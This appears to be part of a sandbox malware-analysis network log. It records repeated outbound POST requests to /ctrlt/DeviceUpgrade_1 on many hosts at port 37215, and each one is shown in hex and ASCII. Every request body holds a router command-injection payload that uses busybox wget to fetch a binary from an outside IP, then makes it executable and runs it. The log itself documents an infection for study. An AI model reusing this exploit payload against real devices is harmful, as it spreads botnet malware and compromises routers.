                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            408192.168.2.1546804197.133.91.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782883883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            409192.168.2.1543438197.201.106.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782886028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            410192.168.2.1552090197.21.218.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782939911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            411192.168.2.1544866197.50.91.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782987118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            412192.168.2.1535354197.99.54.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782987118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            413192.168.2.1556548197.26.0.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783008099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            414192.168.2.1536148197.133.54.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783051968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            415192.168.2.1559262197.234.100.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783063889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            416192.168.2.1558832197.133.96.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783093929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            417192.168.2.1555420197.244.37.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783148050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 